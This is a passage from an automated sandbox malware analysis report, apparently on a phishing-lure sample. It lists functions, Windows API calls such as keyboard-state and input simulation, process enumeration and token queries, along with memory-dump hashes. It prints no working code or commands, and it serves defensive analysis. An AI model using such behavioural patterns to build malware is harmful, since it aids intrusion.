                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2652629310-0
                                                                                                                    • Opcode ID: bd121706348d5b01cfd93d6bc7b38f5b17b479a93cf532e7c30073d863c11745
                                                                                                                    • Instruction ID: 689c210517e6966fc01e91c255d5c5e42c5103e98bd386e15c1d3ae1402356da
                                                                                                                    • Opcode Fuzzy Hash: bd121706348d5b01cfd93d6bc7b38f5b17b479a93cf532e7c30073d863c11745
                                                                                                                    • Instruction Fuzzy Hash: 7631BC72A0120AABDF249F64DC45EAE7FA5EB41720F054268FC04D7290EB39DD50EBA0
                                                                                                                    Function 00FA52C1 Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(?,00001024,00000000,?), ref: 00FA5352
                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00FA5375
                                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00FA5382
                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00FA53A8
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LongWindow$InvalidateMessageRectSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3340791633-0
                                                                                                                    • Opcode ID: 448a347dc560f57efd0400d0ad08ed3c6c1c4d9bdd59c8996ae691bd45d1e870
                                                                                                                    • Instruction ID: 551ff8df6748515bd3c26d48bc272a170553737bb13c0616b08b3ec75afef667
                                                                                                                    • Opcode Fuzzy Hash: 448a347dc560f57efd0400d0ad08ed3c6c1c4d9bdd59c8996ae691bd45d1e870
                                                                                                                    • Instruction Fuzzy Hash: EE31D2B5E55B0CFFEF349A54CC45BE83767AB86BA0F584001FA11962E1C7B1A940BB81
                                                                                                                    Function 00F7AB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetKeyboardState.USER32(?,7707C0D0,?,00008000), ref: 00F7ABF1
                                                                                                                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 00F7AC0D
                                                                                                                    • PostMessageW.USER32(00000000,00000101,00000000), ref: 00F7AC74
                                                                                                                    • SendInput.USER32(00000001,?,0000001C,7707C0D0,?,00008000), ref: 00F7ACC6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 432972143-0
                                                                                                                    • Opcode ID: 36395ffc4e9a3f2fc72dceef0b048b8e1110543bb94e898b95dac989e2499511
                                                                                                                    • Instruction ID: 10346a1dbd912118b0f3bfd98b75045b9a29531852c3790458175cf1b0f85a14
                                                                                                                    • Opcode Fuzzy Hash: 36395ffc4e9a3f2fc72dceef0b048b8e1110543bb94e898b95dac989e2499511
                                                                                                                    • Instruction Fuzzy Hash: 9B31F670E046187FEF26CB658C05BFE7AA5ABC9320F05D21BE489921D1C375C985A793
                                                                                                                    Function 00FA7674 Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ClientToScreen.USER32(?,?), ref: 00FA769A
                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00FA7710
                                                                                                                    • PtInRect.USER32(?,?,00FA8B89), ref: 00FA7720
                                                                                                                    • MessageBeep.USER32(00000000), ref: 00FA778C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1352109105-0
                                                                                                                    • Opcode ID: fd087d08f412436d9e7ed27e006324afccdd230bf336ae3e2919b501f431f2bb
                                                                                                                    • Instruction ID: 9a6d9514c7e2cac856ac328c15b0f5e08bbfbd6efc641747d53820d6135094e7
                                                                                                                    • Opcode Fuzzy Hash: fd087d08f412436d9e7ed27e006324afccdd230bf336ae3e2919b501f431f2bb
                                                                                                                    • Instruction Fuzzy Hash: F5419CB4A09358DFDB01EF59CC94EA9BBF4BB4A310F1940A9E4149B261C730A941EB90
                                                                                                                    Function 00FA16DA Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetForegroundWindow.USER32 ref: 00FA16EB
                                                                                                                      • Part of subcall function 00F73A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00F73A57
                                                                                                                      • Part of subcall function 00F73A3D: GetCurrentThreadId.KERNEL32 ref: 00F73A5E
                                                                                                                      • Part of subcall function 00F73A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00F725B3), ref: 00F73A65
                                                                                                                    • GetCaretPos.USER32(?), ref: 00FA16FF
                                                                                                                    • ClientToScreen.USER32(00000000,?), ref: 00FA174C
                                                                                                                    • GetForegroundWindow.USER32 ref: 00FA1752
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2759813231-0
                                                                                                                    • Opcode ID: bf7781c6fdd6a958485c30b1010759a6fbcd2202ee2d6a65294288e417d39ee8
                                                                                                                    • Instruction ID: 66444bf3494643a99b92aa962146c2fefb0c655e35bcef93fd8aa528103b35cd
                                                                                                                    • Opcode Fuzzy Hash: bf7781c6fdd6a958485c30b1010759a6fbcd2202ee2d6a65294288e417d39ee8
                                                                                                                    • Instruction Fuzzy Hash: D0314FB5D00249AFD700EFA9C881CEEBBF9EF49304B5480AAE415E7211D735DE45DBA0
                                                                                                                    Function 00F7D4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00F7D501
                                                                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 00F7D50F
                                                                                                                    • Process32NextW.KERNEL32(00000000,?), ref: 00F7D52F
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00F7D5DC
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 420147892-0
                                                                                                                    • Opcode ID: c4d14b0d659a5deebcd7978076ce80b8f7db73a464f8f0dad9ea4fa17923b731
                                                                                                                    • Instruction ID: e7d2c26d28d53cc935951a5421380c99d66a9fb2c2c2330c12620a0ab7703bda
                                                                                                                    • Opcode Fuzzy Hash: c4d14b0d659a5deebcd7978076ce80b8f7db73a464f8f0dad9ea4fa17923b731
                                                                                                                    • Instruction Fuzzy Hash: E6319E721083009FD300EF54CC81AAFBBF8EF99354F54492EF585821A1EB719984EBA3
                                                                                                                    Function 00FA8FC9 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00F29BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00F29BB2
                                                                                                                    • GetCursorPos.USER32(?), ref: 00FA9001
                                                                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00F67711,?,?,?,?,?), ref: 00FA9016
                                                                                                                    • GetCursorPos.USER32(?), ref: 00FA905E
                                                                                                                    • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00F67711,?,?,?), ref: 00FA9094
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2864067406-0
                                                                                                                    • Opcode ID: a1380b067ed8ba4de1dce9cf738fa50b75772b4b3888f27fbf730c8b53afbd20
                                                                                                                    • Instruction ID: a8b79b33be88973f906bb5cc5a556f0761821df2b814f2dd605404785ac6ca4a
                                                                                                                    • Opcode Fuzzy Hash: a1380b067ed8ba4de1dce9cf738fa50b75772b4b3888f27fbf730c8b53afbd20
                                                                                                                    • Instruction Fuzzy Hash: 95219175A04018EFDB258FA5DC58EEA7BB9FF8A3A0F148065F5054B261C371A950FB60
                                                                                                                    Function 00F7D2C1 Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetFileAttributesW.KERNEL32(?,00FACB68), ref: 00F7D2FB
                                                                                                                    • GetLastError.KERNEL32 ref: 00F7D30A
                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00F7D319
                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00FACB68), ref: 00F7D376
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2267087916-0
                                                                                                                    • Opcode ID: 254589bb211a7f9b1fca9e0e22340404247f4100c53c66df89c4fa0373ee2b89
                                                                                                                    • Instruction ID: 0a9a066c29a04bf902dd0fc4b263ba2177dc8817bf182691894c985ca8c88657
                                                                                                                    • Opcode Fuzzy Hash: 254589bb211a7f9b1fca9e0e22340404247f4100c53c66df89c4fa0373ee2b89
                                                                                                                    • Instruction Fuzzy Hash: 4621A3709083019F8700DF24C8819AA77F4EE56368F908A1EF49DC32A1DB31D945EB93
                                                                                                                    Function 00F71571 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00F71014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00F7102A
                                                                                                                      • Part of subcall function 00F71014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00F71036
                                                                                                                      • Part of subcall function 00F71014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F71045
                                                                                                                      • Part of subcall function 00F71014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00F7104C
                                                                                                                      • Part of subcall function 00F71014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F71062
                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00F715BE
                                                                                                                    • _memcmp.LIBVCRUNTIME ref: 00F715E1
                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F71617
                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00F7161E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1592001646-0
                                                                                                                    • Opcode ID: 171606e18652020d8cc5b30401fbfc06e304ae1e0bdb9e1889dda1ad50ce4dde
                                                                                                                    • Instruction ID: 66570cda82a23f0c892d4ccd74e44c48da2aa8decad7f3929cd7cedacad21305
                                                                                                                    • Opcode Fuzzy Hash: 171606e18652020d8cc5b30401fbfc06e304ae1e0bdb9e1889dda1ad50ce4dde
                                                                                                                    • Instruction Fuzzy Hash: 2B217C71E00108EFDB14DFA8D945BEEB7B8FF44354F18845AE445AB241E730AA09EB91
                                                                                                                    Function 00FA2782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 00FA280A
                                                                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00FA2824
                                                                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00FA2832
                                                                                                                    • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00FA2840
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Long$AttributesLayered
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2169480361-0
                                                                                                                    • Opcode ID: b2d9c0d2deb558b8df32775522770d1d83e1bce85501721d6ea79eb65c49c2a0
                                                                                                                    • Instruction ID: a4645fdbf8ad14d83503c0e3c7e1d02254b307507c562c741527bd0aa42d0c71
                                                                                                                    • Opcode Fuzzy Hash: b2d9c0d2deb558b8df32775522770d1d83e1bce85501721d6ea79eb65c49c2a0
                                                                                                                    • Instruction Fuzzy Hash: 2321F171704110AFD7549B28CC44FAA7B95AF46324F188158F4268B6E2CB79FD82DBD0
                                                                                                                    Function 00F778F5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00F78D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00F7790A,?,000000FF,?,00F78754,00000000,?,0000001C,?,?), ref: 00F78D8C
                                                                                                                      • Part of subcall function 00F78D7D: lstrcpyW.KERNEL32(00000000,?,?,00F7790A,?,000000FF,?,00F78754,00000000,?,0000001C,?,?,00000000), ref: 00F78DB2
                                                                                                                      • Part of subcall function 00F78D7D: lstrcmpiW.KERNEL32(00000000,?,00F7790A,?,000000FF,?,00F78754,00000000,?,0000001C,?,?), ref: 00F78DE3
                                                                                                                    • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00F78754,00000000,?,0000001C,?,?,00000000), ref: 00F77923
                                                                                                                    • lstrcpyW.KERNEL32(00000000,?,?,00F78754,00000000,?,0000001C,?,?,00000000), ref: 00F77949
                                                                                                                    • lstrcmpiW.KERNEL32(00000002,cdecl,?,00F78754,00000000,?,0000001C,?,?,00000000), ref: 00F77984
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: lstrcmpilstrcpylstrlen
                                                                                                                    • String ID: cdecl
                                                                                                                    • API String ID: 4031866154-3896280584
                                                                                                                    • Opcode ID: 16358890b844532d92491e97dbf384aad51bb69abde748a9c4a1c9a02fbc8720
                                                                                                                    • Instruction ID: 4cab584048732b93306f46b58276fc5a5f29cfdf2a0606242bb039088e6c5dd4
                                                                                                                    • Opcode Fuzzy Hash: 16358890b844532d92491e97dbf384aad51bb69abde748a9c4a1c9a02fbc8720
                                                                                                                    • Instruction Fuzzy Hash: 5F11D63A211305ABCB156F34DC49E7B77B5FF99390B50802BF94AC7264EB319811E792
                                                                                                                    Function 00FA7CC2 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00FA7D0B
                                                                                                                    • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00FA7D2A
                                                                                                                    • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00FA7D42
                                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00F8B7AD,00000000), ref: 00FA7D6B
                                                                                                                      • Part of subcall function 00F29BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00F29BB2
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Long
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 847901565-0
                                                                                                                    • Opcode ID: 65cbb7c61b6dab39de2221e41095859365b1cc973eeea394ccea4289ae564756
                                                                                                                    • Instruction ID: d903f649810646308e77af2a8d961de15221e55cdb3aa07766eb7ace73b6bd95
                                                                                                                    • Opcode Fuzzy Hash: 65cbb7c61b6dab39de2221e41095859365b1cc973eeea394ccea4289ae564756
                                                                                                                    • Instruction Fuzzy Hash: 2F11A5B2A047599FCB10AF29CC04E6A3BA5BF46370B154724F839DB2F0D7309950EB90
                                                                                                                    Function 00FA5660 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(?,00001060,?,00000004), ref: 00FA56BB
                                                                                                                    • _wcslen.LIBCMT ref: 00FA56CD
                                                                                                                    • _wcslen.LIBCMT ref: 00FA56D8
                                                                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00FA5816
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend_wcslen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 455545452-0
                                                                                                                    • Opcode ID: 9686825bc784dfd9819d8511c3139dcd3a8c683190679c1045f33eabb6953e1a
                                                                                                                    • Instruction ID: ca6fb28de6901172dc3c5ef4da150dc126ec30294f0cf6e9614192545280875c
                                                                                                                    • Opcode Fuzzy Hash: 9686825bc784dfd9819d8511c3139dcd3a8c683190679c1045f33eabb6953e1a
                                                                                                                    • Instruction Fuzzy Hash: 5611B1F6A0060896DF20DF618C85AEE77BCBF16B70F104026F915D6181EB74DA84EBA1
                                                                                                                    Function 00F41D09 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
